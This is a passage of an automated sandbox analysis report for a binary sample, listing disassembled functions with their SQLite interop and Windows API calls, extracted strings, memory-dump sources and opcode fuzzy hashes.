                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 137da63ea0d722c1d2ff876ea60159f40174ad70eedad11c8e0b7f1fba35886a
                                                                                      • Instruction ID: 99634c783346b66c4c2a14af6698ec2244244d90b0c5cf7c94932e539bf8229b
                                                                                      • Opcode Fuzzy Hash: 137da63ea0d722c1d2ff876ea60159f40174ad70eedad11c8e0b7f1fba35886a
                                                                                      • Instruction Fuzzy Hash: 6921C4B8B026015BE724DB25D510FBB7396AF4021EF14452EC4578AF91EB24F419C782
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CE540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4CE648
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: *Ml
                                                                                      • API String ID: 223094752-525786747
                                                                                      • Opcode ID: 16dfff6bef787f40595c0a942b3dde844e69ea81365e9727425ff317d8bf3751
                                                                                      • Instruction ID: 31c5d632e418d331518242c4af0cab10a591af447ceee2b1b315d641459b467d
                                                                                      • Opcode Fuzzy Hash: 16dfff6bef787f40595c0a942b3dde844e69ea81365e9727425ff317d8bf3751
                                                                                      • Instruction Fuzzy Hash: 8841EC75B007049BD720CF69C881F9ABBE4EF48319F1405A9E889CBB60E335E944CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CD7B0 Relevance: 3.1, APIs: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4CD8C3
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000000,?,00000000,?,?,?,?,?,6C4C96DB), ref: 6C4CD8CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: f954592fac5c50ed08cb3465cedf9488befd6b806308fa4a8b3f7f64e5582d8f
                                                                                      • Instruction ID: 3d5de42d08adbb260028ed9fead2195f05b8208f68c23399fb14d061fda65ad0
                                                                                      • Opcode Fuzzy Hash: f954592fac5c50ed08cb3465cedf9488befd6b806308fa4a8b3f7f64e5582d8f
                                                                                      • Instruction Fuzzy Hash: 1D31E2797813019BEB20CE55CC81F1A73E1AF84729F10492CE9798BBA0D771E909C7A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C492DA0 Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000001,?,?,?,?,6C492C58,00000000,00000000), ref: 6C492E1C
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,00000001,?,?,?,?,6C492C58,00000000,00000000), ref: 6C492E8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: a9a665f579417493e64e93d000e1f5aa27dbc8f53725c80fa019cf37b12d802c
                                                                                      • Instruction ID: 76bc250cc2c4888a16ea698161ef3faa5e1b9504a9173dc84d37128ae0d42a4e
                                                                                      • Opcode Fuzzy Hash: a9a665f579417493e64e93d000e1f5aa27dbc8f53725c80fa019cf37b12d802c
                                                                                      • Instruction Fuzzy Hash: C1314A70A06B219BDB7ACF24C4C8FABBBA0BF49705F10062EC45A46F04DB31A845CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4BE4F0 Relevance: 1.6, APIs: 1, Instructions: 147COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,6C4DE0CB,000000FF), ref: 6C4BE569
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: e4f2abedbc298bddd8d41ff41471f3eed9785444f5bca2e1c4f0ca91fcc6a4cc
                                                                                      • Instruction ID: 0a01e8d3a804cdb9cc3003f0273076caa4ff4a0e926c44948200493649fc2335
                                                                                      • Opcode Fuzzy Hash: e4f2abedbc298bddd8d41ff41471f3eed9785444f5bca2e1c4f0ca91fcc6a4cc
                                                                                      • Instruction Fuzzy Hash: A6415C71601B018BD720CF69D9C0E66B3F5AF84319B144A7DE89AD7B51F731E80987E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D1EE0 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,6C4C96DB), ref: 6C4D2038
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 9220886c323eb3fef62cb2be131c6435d82f09098d013c14b89fc4a31eead99f
                                                                                      • Instruction ID: 8da4df97113d7555a76e4a0247963b22ab0eec31013a315dd361e56d5cfb77aa
                                                                                      • Opcode Fuzzy Hash: 9220886c323eb3fef62cb2be131c6435d82f09098d013c14b89fc4a31eead99f
                                                                                      • Instruction Fuzzy Hash: 2F41AB707006018BE710EBA9C850FABB7F5AF84319F16442CE96AC7B51EB35F905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D6560 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(6C5142F4), ref: 6C4D6610
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 223094752-0
                                                                                      • Opcode ID: 18bd4a5d1fffbd02ed57d803fa5bacb40a7ffe9217ec570abc2e17453abab71a
                                                                                      • Instruction ID: b6d0d96618438726b6185fb76b32851f92be372153e2146d95664e6288409540
                                                                                      • Opcode Fuzzy Hash: 18bd4a5d1fffbd02ed57d803fa5bacb40a7ffe9217ec570abc2e17453abab71a
                                                                                      • Instruction Fuzzy Hash: 6E113DB5B122518BDF18DB29AC6EC9637B4AB4661A3071839E806D3E00D720E5D1CB9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0108C1CC Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0108F098), ref: 0108F116
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3363455380.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1080000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: d5b06dd4dcdaaea3877f68bbecd785e23cb0a684566f7bc139b1fa2c143bed1a
                                                                                      • Instruction ID: e67228c8a48033cb6c4b0957d06b03575dacba7e5baa16c7c340b987da7e997f
                                                                                      • Opcode Fuzzy Hash: d5b06dd4dcdaaea3877f68bbecd785e23cb0a684566f7bc139b1fa2c143bed1a
                                                                                      • Instruction Fuzzy Hash: FC1112B18047498FDB20DFAAC444B9EFBF5EB89220F20845AD599B7200D379A549CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C40F0A0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 6C40F0BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2050909247-0
                                                                                      • Opcode ID: cc994de34fc1cfb78f52cb65c61c88bd6a8fbb1d35372be81e38a1fafdaf0e81
                                                                                      • Instruction ID: 1bb54a50ade173f867831e980f3b6aa50468659a6cdd31b3e079ed804015bf2e
                                                                                      • Opcode Fuzzy Hash: cc994de34fc1cfb78f52cb65c61c88bd6a8fbb1d35372be81e38a1fafdaf0e81
                                                                                      • Instruction Fuzzy Hash: 39018B327411198BDB10CF59E841EDA7776EBC43A5F24803BED108B712C771A861CBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4E1E60 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIa069da76968b7553.SQLITE.INTEROP(00000004,6C50A14C,?,6C449257), ref: 6C4E1E76
                                                                                        • Part of subcall function 6C448DB0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028CF7,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,6C5028BC,6C449309), ref: 6C448DDB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.Ia069da76968b7553.
                                                                                      • String ID:
                                                                                      • API String ID: 3738119732-0
                                                                                      • Opcode ID: 5597d5cf7b3421aa6edbc2c6cb6c3910ec49d7538594b574e54cc34079034568
                                                                                      • Instruction ID: f5b7c1bf42b355c06fc5144d6fa813213557d419a836175d7a44f02db0cc7db9
                                                                                      • Opcode Fuzzy Hash: 5597d5cf7b3421aa6edbc2c6cb6c3910ec49d7538594b574e54cc34079034568
                                                                                      • Instruction Fuzzy Hash: 92018B70A813868AEF14CB288C0EF013670A31731EF131729E82454E92E7B081D8968A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00D9D3F0 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358716786.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d9d000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 495ba399da53a65ee9d427ffa314b0941fc52e8c49438453dda04e9be8c5e24e
                                                                                      • Instruction ID: c8aaf709cbf9f7bcbfffe8a36074b536ee8f4fb73c6635915fc5f944a1347b1c
                                                                                      • Opcode Fuzzy Hash: 495ba399da53a65ee9d427ffa314b0941fc52e8c49438453dda04e9be8c5e24e
                                                                                      • Instruction Fuzzy Hash: A521F572504204EFDF15EF14D9C0B26BF66FB98324F24C569E9090B256C336E856CAB2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00DAE69C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358814067.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_dad000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 512a2abab56d378641959826cfab3041d335f2461d4c42eee2aa5b86c415a109
                                                                                      • Instruction ID: 13bc48016f2733f469ad7a289102f2464fdc9aa0c52388e9cdf8e9449ab9241f
                                                                                      • Opcode Fuzzy Hash: 512a2abab56d378641959826cfab3041d335f2461d4c42eee2aa5b86c415a109
                                                                                      • Instruction Fuzzy Hash: 86212675604344EFDB04DF24D5C0B26BB65FB85314F28C96DE9494B292C37AD846CB72
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00D9D3EB Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358716786.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d9d000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                      • Instruction ID: 1784389f477818a03ef4eb4db8219d7632773c7107bfab53dcfb6c3172f22829
                                                                                      • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                      • Instruction Fuzzy Hash: 4211D376504240DFCF15DF10D5C4B16BF72FB94324F28C5A9D8090B656C33AE85ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00DAE697 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358814067.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_dad000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                      • Instruction ID: 9983c4022fe367a47017d85c4c7b9b6c5751d1689a518c3ae1e918787e614bfa
                                                                                      • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                                      • Instruction Fuzzy Hash: AB118B79504284DFCB05CF10D5C4B15BBA2FB85318F28C6A9D8494B666C33AD84ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00D9D849 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358716786.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d9d000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38e2ca9aaaa975b91efd9e6228d5fa24b6686ba13398bf08eed23b1e0aeb424b
                                                                                      • Instruction ID: 902f6443b27c1895410b2310ff9292c927c710e57b335f7df0fa2db5db4f54f9
                                                                                      • Opcode Fuzzy Hash: 38e2ca9aaaa975b91efd9e6228d5fa24b6686ba13398bf08eed23b1e0aeb424b
                                                                                      • Instruction Fuzzy Hash: CD012B71004340EAEB105F25CC80B66FFA8EF41360F1CC51AED480B287C378D844D6B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00D9D848 Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3358716786.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d9d000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 57d58359d159f856ab2d14b27cf862c23b4abde7db678c7bed0115f888f95add
                                                                                      • Instruction ID: 6d3061bbac677fc89aa4a2b9bf47e9c41b19e8e35344992413703901585f9293
                                                                                      • Opcode Fuzzy Hash: 57d58359d159f856ab2d14b27cf862c23b4abde7db678c7bed0115f888f95add
                                                                                      • Instruction Fuzzy Hash: 2CF0CD71404344AAEB208E06CC84B62FFA8EB91734F18C45AED080B283C3799848CAB2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 6C416640 Relevance: 61.4, APIs: 17, Strings: 18, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(CoreCLR,6C445AA5,00000000,?), ref: 6C41668B
                                                                                      • OutputDebugStringA.KERNEL32(detected .NET Core in process.), ref: 6C41669C
                                                                                      • GetModuleHandleW.KERNEL32(MSCorEE), ref: 6C4166AD
                                                                                      • OutputDebugStringA.KERNEL32(missing CLR module in process.), ref: 6C4166BE
                                                                                      • GetLastError.KERNEL32 ref: 6C4166C0
                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 6C4168C8
                                                                                      Strings
                                                                                      • missing CLR function., xrefs: 6C4166F4
                                                                                      • CorBindToRuntimeEx success., xrefs: 6C416757
                                                                                      • CLR creation not implemented., xrefs: 6C41672D
                                                                                      • CLRCreateInstance, xrefs: 6C4166DE
                                                                                      • ICLRRuntimeInfo not loadable., xrefs: 6C4167EF
                                                                                      • could not get ICLRRuntimeInfo., xrefs: 6C4167AA
                                                                                      • v4.0.30319, xrefs: 6C416791
                                                                                      • could not get ICLRRuntimeHost., xrefs: 6C416823
                                                                                      • ICLRRuntimeInfo loadable failure., xrefs: 6C4167D7
                                                                                      • CorBindToRuntimeEx failure., xrefs: 6C416773
                                                                                      • MSCorEE, xrefs: 6C4166A8
                                                                                      • ICLRRuntimeHost query success., xrefs: 6C41682C
                                                                                      • VerifyClrIsLoaded, xrefs: 6C4168A3
                                                                                      • %s HRESULT: 0x%016X, xrefs: 6C4168A8
                                                                                      • missing CLR module in process., xrefs: 6C4166B9
                                                                                      • detected .NET Core in process., xrefs: 6C416697
                                                                                      • could not create ICLRMetaHost., xrefs: 6C41671A
                                                                                      • CoreCLR, xrefs: 6C41665E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugOutputString$HandleModule$ErrorLast
                                                                                      • String ID: %s HRESULT: 0x%016X$CLR creation not implemented.$CLRCreateInstance$CorBindToRuntimeEx failure.$CorBindToRuntimeEx success.$CoreCLR$ICLRRuntimeHost query success.$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$MSCorEE$VerifyClrIsLoaded$could not create ICLRMetaHost.$could not get ICLRRuntimeHost.$could not get ICLRRuntimeInfo.$detected .NET Core in process.$missing CLR function.$missing CLR module in process.$v4.0.30319
                                                                                      • API String ID: 3017022946-2330247439
                                                                                      • Opcode ID: 67dc20347030cb0936d7d74d1596c6a5cd0bae7e931a7fab24cbb05ed5b9ce7b
                                                                                      • Instruction ID: d5231a3ecebe9a8e86e475a00be2c03c21e8c57e02acf7431bfd4b081e2c98ae
                                                                                      • Opcode Fuzzy Hash: 67dc20347030cb0936d7d74d1596c6a5cd0bae7e931a7fab24cbb05ed5b9ce7b
                                                                                      • Instruction Fuzzy Hash: 62618D31B491189BDB40EFA8CC40FE977B5EB8E314F0244AAE598E7A01DB70ED458F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C409C40 Relevance: 52.9, APIs: 11, Strings: 19, Instructions: 424COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(prefix length out of range (max 999),?,?,00000000), ref: 6C409D3D
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(too many prefix indexes (max %d),0000001F,?,?,00000000), ref: 6C409D51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: %Q.%Q$columnsize$content$content_rowid$detail$full$malformed columnsize=... directive$malformed detail=... directive$malformed prefix=... directive$multiple content=... directives$multiple content_rowid=... directives$multiple tokenize=... directives$none$parse error in tokenize directive$prefix$prefix length out of range (max 999)$tokenize$too many prefix indexes (max %d)$unrecognized option: "%.*s"
                                                                                      • API String ID: 962285590-4233059573
                                                                                      • Opcode ID: 6060aae44c859dd1663b9a31b0978fceb9d5fa376acaa000a73a818b20331dc1
                                                                                      • Instruction ID: 9202dc7e95b463071ae31409da7a7d19049fdb12dc5918234e09cb9ee555d140
                                                                                      • Opcode Fuzzy Hash: 6060aae44c859dd1663b9a31b0978fceb9d5fa376acaa000a73a818b20331dc1
                                                                                      • Instruction Fuzzy Hash: 49D18C71F441089BDB10DFA8E850EEEBBB1EF95319F14017DE84596B42E7329846CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E6CC0 Relevance: 37.1, APIs: 13, Strings: 8, Instructions: 343COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C3E6E0F
                                                                                      • SI4983499b64278231.SQLITE.INTEROP(?,00000000), ref: 6C3E6E43
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000000), ref: 6C3E6E73
                                                                                      • SIa3f7b31190ce0815.SQLITE.INTEROP(?,?,00000009,?,00000000), ref: 6C3E6F05
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C3E6FFE
